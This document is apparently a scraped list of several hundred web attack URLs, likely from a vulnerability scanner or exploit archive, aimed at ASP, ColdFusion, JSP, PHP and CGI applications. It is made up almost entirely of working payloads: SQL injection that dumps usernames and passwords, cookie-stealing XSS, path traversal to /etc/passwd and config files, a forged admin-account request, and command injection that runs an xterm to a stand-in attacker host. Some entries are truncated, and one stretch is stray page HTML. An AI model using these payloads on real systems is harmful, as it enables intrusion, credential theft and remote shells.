/src=www.example.com/home-f.asp?sitebid=%00
/src=www.example.com/home-f.asp?sitebid=\"
/src=www.example.com/home-f.asp?sitebid=@@version
/src=www.example.com/home-f.asp?sitebid=JyI%3D
/src=www.example.com/home-f.asp?sitebid=%00
/src=www.example.com/home-f.asp?sitebid=@@version
/src=www.example.com/home-f.asp?sitebid=JyI%3D
/src=www.example.com/home-f.asp?sitebid=%00
/src=www.example.com/home-f.asp?sitebid=@@version
/src=www.example.com/home-f.asp?sitebid=JyI%3D
/src=www.example.com/home-f.asp?sitebid=%00
/src=www.example.com/home-f.asp?sitebid=@@version
/src=www.example.com/home-f.asp?sitebid=JyI%3D
/src=www.example.com/home-f.asp?sitebid=%00
/search.asp?search=1&submit=Search&category='[sql]
 perl simpleblog3.pl www.example.com/path\n\n";
/venue_detail.asp?VenueID='[sql]
/WSFTPSVR/FTPLogServer/LogViewer.asp
/store/addToCart.asp?idProduct=[SQL]&quantity=1 
/showerr.asp?BoardID=0&ErrCodes=54&action=<script>JavaScript
/forminfo.asp?refno=[xss]
/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE]
/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3
/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE]
/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title= 
/post_message_form.asp?mode=quote&PID=1111&FID=1&TID=11&TPN=1
/DUforum/forums.asp?iFor=[SQL Inject] 
/[path]/default.asp?cat=[SQL] 
/[Path]/Employee/emp_login.asp?msg=%3Cimg%20dynsrc%3D%22JaVaScRiPt
/civica/press/display.asp?layout=1&Entry=1,2,3,4,5,......
/civica/press/display.asp?layout=1&Entry=1 having 1=1
/civica/press/display.asp?layout=1&Entry=1,2,3,4,5,,,,,+upd
/mcartlite/productsByCategory.asp?intCatalogID=1&strCatalog_NAME=<script>alert('test')</script> 
/faqDsp.asp?catcode=[SQL] 
/store/addToWishlist.asp?idProduct='"><script>alert(document.cookie)</script> 
/domains.asp?txtDomainName=[XSS]%21&btnSubmit.x=0&btnSubmit.y=0 http/users.asp?SKey=AKU7ACC552W25EA4E8RPBYP67D7EB6RAAJPM8XKA&txtCompanyName=[XSS]&btnSubmit.x=0&btnSubmit.y=0 http
/default.asp?setThemeColour=[XSS]
/domains.asp?txtDomainName=[XSS]%21&btnSubmit.x=0&btnSubmit.y=0#
/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http
/msms/ver.asp
/compareHomes.asp?compare='[sql]
/compareHomes.asp?compare=Compare&clear='[sql]
/compareHomes.asp?compare=Compare&clear=Clear&adID='[sql]
/news_view.asp?ID=[SQL query]
/dirSub.asp?sid=[sql]
/store/productCatalogSubCats.asp?idParentCategory=[SQL] 
/acidcat/default.asp?ID=1'
/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
/news_and_events_new.asp?p_MenuAlias=news&p_news_id=1[SQL]
/ad.asp?AD_ID=[sql]
/ad.asp?cat_id=[sql]
/ad.asp?cat_id=35&sub_id=[sql]
/ad.asp?cat_id=35&sub_id=102&ad_id=[sql]
/album.asp?cat=[XSS]&albumid=1
/test_DUportal/home/type.asp?iCat='SQL_INJECTION&iChannel=8&nChannel=Products 
/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx
/toas/icue_login.asp?error_msg=These%20aren't%20the%20droids%20you're%20looking%20
/edtalbum.asp?cat=&albumid=1&apage=[XSS]
/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=[SQL]&priceTo=9999999999&validate=1 
/templates/Page.aspx?id=20691
/news.asp?id=7661
/system/linkurl.asp?root=../../../
/templates/CommonPage____19461.asp 
/pc/viewPrd.asp?idcategory=[catid][SQL INJECTION]&idproduct=[prod id]
/con.cfm 
/aux.cfm 
/com1.cfm 
/com2.cfm
/index.cfm?fuseaction="><script>alert(document.cookie)</script><
/index.cfm?fuseaction=fusebox.overview"><script>alert(document.cookie)</script>< 
/view_archive.cfm?ListID=[SQL]
/&USER_AGENT=%3Cscript%3Ealert(String.fromCharCode(120,115,115))%3C/s> cript%3E&HTTP_REFERER=http
/view_thread.cfm?ForumID=1[SQL]
/view_thread.cfm?ForumID=1&ThreadID=1&Thread=1[SQL]
/view_thread.cfm?ForumID=1&ThreadID=1[SQL]
/forums/index.cfm?page=XSS 
/Results.cfm?category=[SQL]
/Results.cfm?keywords=[SQL]
/index.cfm?fuseaction=page.viewPage&pageID=1&nodeID=1[SQL]
/index.cfm?fuseaction=page.viewPage&pageID=1[SQL]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=&docDescription=&docPublishYear=&presentationSite=&parentid=16&ID=1[SQL]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=&docDescription=&docPublishYear=&presentationSite=&parentid=[SQL]
/document/docWindow.cfm?fuseaction=document.viewDocument&documentid=1&documentFormatId=[SQL]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=&docDescription=&docPublishYear=&presentationSite=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=&docDescription=&docPublishYear=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=&docDescription=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=&publishState=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=&docAuthor=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=&docTitle=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=&subTopic=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=&topic=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=&topicRadio=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=8&topicOnly=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=PublishDate&startrow=[XSS]
/index.cfm?fuseaction=Document.showDocumentSection&sortby=[XSS] 
/commonspot/utilities/longproc.cfm?onlyurlvars=1&url=%27;--%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E
/local.cfm?redir=listings&srchby=&companyid=[SQL]
/local.cfm?redir=listings&srchby=ct&cat=&scat=[SQL]
/local.cfm?redir=adv_details&coid=[SQL]
/forum/forum.cfm?FID=<script>JavaScript
/article.cfm?id=1'<script>alert(document.cookie);</script> 
/forum/include/error/autherror.cfm?FTVAR_URLP=x&errorcode=[SQL_INJ] 
/index.cfm?sector=../local file
/index.cfm?sector=quotes&page=../local file 
/archives.cfm/search/?term=%3Cbody%20onload=alert(document.cookie)%3E
/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author
/page.cfm?id=null+and+100=99+union+select+1,2,3,4,conca(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata 
/path_of_script/index.cfm?fuseaction=Portal.ShowPage&categoryId=[XSS]
/CategoryResults.cfm?div=7&cat=118&cat_parent=107&series=[SQL]
/CategoryResults.cfm?div=7&cat=118&cat_parent=[SQL]
/CategoryResults.cfm?div=7&cat=[SQL]
/CategoryResults.cfm?div=[SQL] 
/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God&FTVAR_LASTNAMEFRM=God&FTVAR_EMAILADDRESSFRM=Attacker@acker.com&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFORUMSFRM=0&FTVAR_USERTYPEFRM=g&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RETURNERROR=Yes&FT_ACTION=adduser
/search/index.cfm?keywords=[XSS]&x=25&y=9 
/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select%20userid%20from%20users)
/instaboard/index.cfm?frmid=1&tpcid=1%20SQL
/instaboard/index.cfm?frmid=1%20SQL&tpcid=1
/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11
/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL
/instaboard/index.cfm?catid=1%20SQL 
/forum/forum.cfm?FID=<script>JavaScript
/forum/include/error/autherror.cfm?errorcode=1
/blog/forum/include/error/autherror.cfm?errorcode=1
/view_forum.cfm?ForumID=1[SQL]
/index.cfm?sector=news&page=topic&topic=
/index.cfm?sector=links&page=links&cmd=view&cat=
/index.cfm?sector=news&page=read&newsid=
/Details.cfm?ProdID=[SQL]
/book.cfm?StartRow=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E 
/forum/forum.cfm?FID=<script>JavaScript
/forum/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss]
/path_of_script/index.cfm?fuseaction=Portal.Showpage&categoryid=311&newsId=[SQL]
/path_of_script/index.cfm?fuseaction=Portal.Showpage&categoryid=[SQL]
/path_of_script/index.cfm?langId=[SQL]
/forum/forum.cfm?FID=<script>JavaScript
/printer_friendly.cfm?id=[SQL]
/show.cfm?id=274&obcatid=10[XSS]
/show.cfm?id=279&how=5&obcatid=9&shfrm=1&comid=[XSS] 
/local.cfm?srchfor=%3Cscript%3Ealert%28%27r0t%27%29%3
/local.cfm?srchfor=&cat=0&x=78&y=22&RequestTimeOut=50
/chat.ghp?username=aaaa[ 295 of a ]aaaa&password=&room=1&sex=0
/chat.ghp?username=FakeUser&password=&room=1&sex=0 
/xampp/security.php 
/cpqdev.htm they can locate other machines.
/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=http
/examples/servlets/servlet/CookieExample?cookiename=test&cookievalue=test%5c%5c%22%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%
/.../.../scandisk.log 
/recordings/misc/audio.php?recording=/var/spool/asterisk/voicemail/default/<mailbox>/INBOX/msg<messageid>.wav
/../etc/passwd
/../../etc/passwd
/../../../boot.ini
/../../../../boot.ini
/webService/webServicesGeneral.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
/safari/safari2.html" onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe> 
/scripts/wgate/!?~urlmime=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cimg%20src=%22
/pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl='<script>alert('inT')</script>&p_newurl='<script>alert('ellect')</script> 
/sysnet/registration.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
/chat/data/usr
/<script>alert("bang")</script> 
/securelogin/1,2345,A,00.html?Errmessage="x214>x214 
/?PageServices 
/<script>alert("Test")</script>
/<script>alert('XSS')</script>
/Search
/~Account%20Name/Search 
/CGI-BIN/foo
/theme/META-INF/>+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-
/help/readme.nsf/Header?OpenPage=&BaseTarget=%22;//%20--%3E%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('xss')</script>
/?offset=1&cid=1&limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/?offset=1&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cid=1
//setTimeout is used just to wait for page loading </script>
/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> HTTP HEADER
/%1b%5d%32%3b%6f%77%6e%65%64%07%0a 
/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript
/perl-status/APR
/pls/otn/f?p=4500
/page.jsp?blah=/../WEB-INF/web.xml 
/ibm/console/<script>alert('DSecRG_XSS')</script>
/ibm/console/<script>alert('DSecRG_XSS')</script>.jsp
/pls/otn/wwv_flow.accept?p_flow_id=4500&p_flow_step_id=3&p_instance=428576542275032284&p_page_submission_id=3334304&p_request=RUN&p_arg_names=
/<script>alert("Test")</script> 
/file.php%20%20%20 
/Forms/login1?login_username=<ScRiPt>alert(&#039;hello&#039;);</ScRiPt>
/xampp/phonebook.php?lastname=Cru3l.b0y&firstname=&phone=
/console/portal//Server/Shutdown/__ac0x3console-base0x2ServerManager!-1172254814|0'
/ [1799 bytes --needed to avoid XXS] [243 bytes --XXS code]
/<IMG SRC="javascript
/texis/nonexistent/path/ 
/scripts/counter.exe?%0A". Any further attempt for request will result in an Access Violation in counter.exe.
/scripts/counter.exe?AAAAA" with over 2200 A's.
/portal/page?_pageid=<pageid>&_dad=portal&_schema=<schema>&key="><script>alert('xss_bug_found');</script>
/jsp-examples/cal/cal2.jsp?time="/><script>alert('Gotcha')</script> 
/console/portal/Server/Monitoring
/console/portal//Server/Monitoring/__ac0x3monitoring0x2monitoring!126896788|0/__pm0x3monitoring0x2monitoring!126896788|0_edit?action=saveA
//
/./
/zport/dmd/ZenUsers/admin?defaultAdminLevel
/zport/dmd/userCommands/ping?command
/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping 
/NONEXISTANT
/a*/
/sx-users?op=setUsr&ag=&rg=&nm=root&hd=%2Froot&pw=test&pwc=test&grpSlct=
/_error?id=[id]&errormsg=<script>alert(document.cookie)</script>
/portal/%0A' site will create a cookie sufficient to trigger the issue and access 'http
/../../../file
/..\..\..\file 
/flv8/player.php?url=[XSS]
/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00 
/struts-virtdir/<script>alert('test')</script>.do 
/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A/DoKnowEvil.swf%3F.jpg%22%3E 
/bugtest+/
/bugtest\/ 
spoof()">test!</a> <p> <script> function spoof() { a = window.open("http
/xampp/showcode.php?showcode=1&file=../index.php 
/console/portal/"><script>alert('DSecRG XSS')</script><!--
/ctx/index%c0%aehtml
/ctx/index.%c1%bfj%c1%bfs%c1%bfp%c1%bf 
/search?ie=[ Evil Code ]&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x'  
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20evil.example.com
/xampp/showcode.php?TEXT[global-showcode]=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/index.html* 
/%2E%2E%5Csystem.log
/%2E%2E\system.log 
/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT> 
/<script>alert("WASH_ME")</script> 
/applications/applications.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
/script.php?param=javascript
/examples/servlets/servlet/CookieExample?cookiename=test&cookievalue=test%5c%5c%22%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%
/names.nsf/<img src="javascript
/twonky
blank Spoof</h1> </center> This vulnerability is based on http
/support/messages 
/<script>alert('XSS');</script>
/a%0a[22;45;24]%20<192.168.1.3>%20(74,632)%20[%90%b3%8f%ed%82%c9%8f%49%97%b9%82%b5%82%dc%82%b5%82%bd]%20GET%20/hack
/customMBeans/customMBeans.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
/main.swf?baseurl=asfunction
/test.htm%20 
/nagiosxi/admin/users.php?records=int8((select > password from xi_users where username= > CHR(110)||CHR(97)||CHR(103)||CHR(105)||CHR(111)||CHR(115)||CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)))&sortby=username&sortorder=asc&search=&page=1 
/proxy/smhui/getuiinfo?JS&servercert=%0064e43<script>alert(1)</script>7b3f58a689f
/<fontname>.swf?txt=<a href="http
/axis/tt_pm4l.jws?wsdl 
/<script>alert(document.cookie)</script> 
/search?NS-max-records=[some number]"<script>
9999/<SCRIPT>document.write(document.domain)</SCRIPT>
9999/www.example.com
/index.js%70
/examples/jsp/num/numguess.js%70
/examples/snp/snoop%252ejsp 
/cgi-bin/db2www/<script>alert(document.domain)</script>/A 
/</link>
/[sips_directory]/sipssys/users/[first_letter_of_UserID]/
/jsptest.jsp+
/jsptest.jsp\ 
//history/#q=%22&#039;%3E%3Ciframe%20src%3D%22http%3A%2F%2www.example.com%22%20height%3D%221024%22%20width%3D%22800%22
//history/#q=%22&#039;%3E%3Ciframe%20src%3D%22http%3A%2F%2www.example.com%22%20height%3D%221024%22%20width%3D%22800%22
/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F2627&selected7=/var/www/recordings/index.php
/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=INBOX&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F4949&selected7=%2Fvar%2Fspool%2Fasterisk%2Fvoicemail%2Fhouston%2F2625%2FINBOX%2Fmsg0000.txt
/htim_enu/start.swe/?>'"><script>alert('XSS by Lament')</script>
/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
/resourceNode/resources.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
/nosuchdb.nsf 
/dav_public
/dav_portal 
/red2301.html?RedirectUrl=evil () attacker com 
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
/script-that-dont-has-to-exist.jsp?foobar="/><script>alert(document.cookie)</script> 
/cgi-bin/ServerView/
/flv8/popup.php?url=%3C/title%3E[XSS] 
/flv8/popup.php?url=%22%3E%3C[XSS]
//setTimeout is used just to wait for page loading </script>
/admin/?kerberos=onmouseover=alert
/Example_controller.swf?csPreloader=http
/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript
/./.../[target file] 
/cgi/bin/test.txt?<script>alert(document.cookie)</script>
/sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=aaaaaaaa<IMG/SRC=JaVaScRiPt
/sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role= aaaaaaaa<IMG/SRC=JaVaScRiPt
/[path]/main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/?OpenDocument&Count='20"><iframe/%20/onload=alert(/XSSByNirG/<http
/tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(document.domain)</script> 
/;index.jsp
/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3
/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
/servlet/pagecompile._admin._help._helpContent_xjsp?page=../../WEB-INF/web.xml
/servlet/pagecompile._admin._login_xjsp
/servlet/pagecompile._admin._vmSystemProperties_xjsp
/servlet/pagecompile._admin._SELogging_xjsp
/servlet/pagecompile._admin._userMgt_xjsp
/servlet/pagecompile._admin._virtualServers_xjsp
/servlet/pagecompile._admin._optionalPackages_xjsp
/servlet/pagecompile._admin._dataSources_xjsp
/servlet/pagecompile._admin._debug_xjsp
/test.php%20 
/wa/auth?&authmech=Assess&reloadFrame=%22;%3Cscript%3Eblah%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/cgi-bin/post.mscgI (Note
/ADM
/opennms/event/query?%0D%0AContent-Length
 /cgi-bin/loadpage.cgi?user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080
 /cgi-bin/search.cgi?user_id=1&database=<insert here>&template=<or insert here>&distinct=1
/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript
/configuration/configuration.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
/A>
/admin/backend/window/loadClass/saveItem?noCache=1277145391050&rsn=1&username=admin&passwd=admin&email=suck2%40example.org&groups=[%221%22]&module=users&code=users%2FeditMe%2F 
 </script><script src="/script><script>
/util/doh/runner.html?dojoUrl=&#039;/>foo</script><&#039;"<script>alert(/xss/)</script>
/<document root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non persistant XSS");</SCRIPT><!--&date=0000000000000 http
//example.com/private/file_management.ssi?PATH=/etc"><script%20src="http
/webMathematica/MSP\<script>alert('a')</script> 
/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script>
/path/banner.swf?clickTAG=javascript
/explore/search/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E/
/login/FilepathLogin.html?reason=<script>alert(0)</script>
/?%3E%3Cscript%3Ealert('XSS')%3C/script%3E
/Flex/index.template.html?"/></object><script>alert('XSS')</script> 
/zport/dmd/Events/getJSONEventsInfo?severity=1&state=1&filter=& offset=0&count=60 into outfile "/tmp/z" 
/dms/slideshow.kspx?shidx=0&idx=-1&sort=d&style=t&delay=15&playmode=play&source=[code]
/dms/slideshow.kspx?source=[code]
/dms/dlasx.kspx?shidx=[code]
/igen/?pg=dlasx.kspx&shidx=[code]
/dms/mediashowplay.kspx?pic=[code]&idx=0
/dms/mediashowplay.kspx?pic=0&idx=[code]
/ccrc/??''??script?alert(1234)?/script?=123 
/modules/mod_joomulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript
/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http
/Serials/upload/?list=<img+src=http
/perl/aaaaaa...[Unspecified number of characters]
/servlet/SnoopServlet
/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas 
/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
/perl/<script>alert('XSS')</script>.pl
/servlet/webacc?User.id="><script>alert('XSS')</script>
/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
/examples/jsp/snp/snoop.jsp
/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E</a>
/ss/twbksrch.P_ShowResults" METHOD="POST"> Search <SPAN class=fieldlabeltextinvisible><LABEL for=keyword_in_id><SPAN class=fieldlabeltext>Search</SPAN></LABEL></SPAN> <INPUT TYPE="text" NAME="KEYWRD_IN" SIZE="20" MAXLENGTH="65" ID="keyword_in_id"> <INPUT TYPE="submit" VALUE="Go"> </FORM> </div> </TD> <TD CLASS="pldefault"><p class="rightaligntext"> <SPAN class="pageheaderlinks"> <A HREF="/ss/twbkwbis.P_GenMenu?name=bmenu.P_GenMnu" class="submenulinktext2" >RETURN TO MENU</A> | <A HREF="/ss/twbksite.P_DispSiteMap?menu_name_in=bmenu.P_MainMnu&depth_in=2&columns_in=3" accesskey="2" class="submenulinktext2">SITE MAP</A> | <A HREF="/wtlhelp/twbhhelp.htm" accesskey="H" onClick="popup = window.open('/wtlhelp/twbhhelp.htm', 'PopupPage','height=450,width=500,scrollbars=yes,resizable=yes'); return false" target="_blank" onMouseOver="window.status=''; return true" onMouseOut="window.status=''; return true"onFocus="window.status=''; return true" onBlur="window.status=''; return true" class="submenulinktext2">HELP</A> | <A HREF="twbkwbis.P_Logout" accesskey="3" class="submenulinktext2">EXIT</A> </span> </TD> </TR> </TABLE> </DIV> <DIV class="pagetitlediv"> <TABLE CLASS="plaintable" SUMMARY="This table displays title and static header displays." WIDTH="100%"> <TR> <TD CLASS="pldefault"> <H2>Update Emergency Contacts</H2> </TD> <TD CLASS="pldefault"> &nbsp; </TD> <TD CLASS="pldefault"><p class="rightaligntext"> <DIV class="staticheaders"> </div> </TD> </TR> <TR> <TD class="bg3" width="100%" colSpan=3><IMG SRC="/wtlgifs/web_transparent.gif" ALT="Transparent Image" TITLE="Transparent Image" NAME="web_transparent" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=3 WIDTH=10></TD> </TR> </TABLE> <a name="main_content"></a> </DIV> <DIV class="pagebodydiv"> <!-- ** END OF twbkwbis.P_OpenDoc ** --> <DIV class="infotextdiv"><TABLE CLASS="infotexttable" SUMMARY="This layout table contains information that may be helpful in understanding the content and functionality of this page. It could be a brief set of instructions, a description of error messages, or other special information."><TR><TD CLASS="indefault">&nbsp;</TD><TD CLASS="indefault"><SPAN class=infotext> Enter a new emergency contact. When finished, Submit Changes. </SPAN></TD></TR></TABLE><P></DIV> <FORM NAME="MyForm" ACTION="https
/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class
/psoft/servlet/resadmin/psoft.hsphere.CP?template_name=mailman/massmail.html&arid=46&curr_menu_id=&start=&next_template=[XSS] http
/app/function?foo=bar%e0%80%bc
/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">
/?gOo=ZXJyb3IuZHd0&errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg== 
/map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73% 74%6D%6F%6E%2E%62%6C%F% 67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%2 1%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%7 9%3E 
/search?query=<script>alert(document.domain)</script> 
/businessobjects/enterprise115/desktoplaunch/InfoView/logon/logon.object;jsessionid=7E1EFA4F83461F81157B67D7EA471A12?qryStr=&cmsVisible=true&authenticationVisible=true&referer=&refererFormData=&isFromLogonPage=true&cms=> 
/admin/ServiceConfiguration.do?operati on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7 0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F% 73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E %4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2 1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20% 21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72 %74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2 F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte r&serviceName=Alerter
/reports/ReportViewAction.do?selected Tab=Reports&selectedNode=Server_Memory_Utilization&reportN ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E %3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F% 6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6 D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20 %21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F% 57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6 1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69 %65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di splayName=webclient.reports.servers.memutil
/search/search.html?searWords=[XSS] 
/sap/bc/gui/sap/its/webgui/aaaaaaa"><img/src=javascript
/en/mail.html?sid=<something>&lang="><script>alert(1);</script> 
/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');// http
/web/guest/home?p_p_id=82&p_p_action=1&p_p_state=%3Cscript%3Ealert('xss+vulnerability')%3C/script%3E&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=1&p_p_col_count=2&_82_struts_action=%2Flanguage%2Fview&_82_languageId=de_DE 
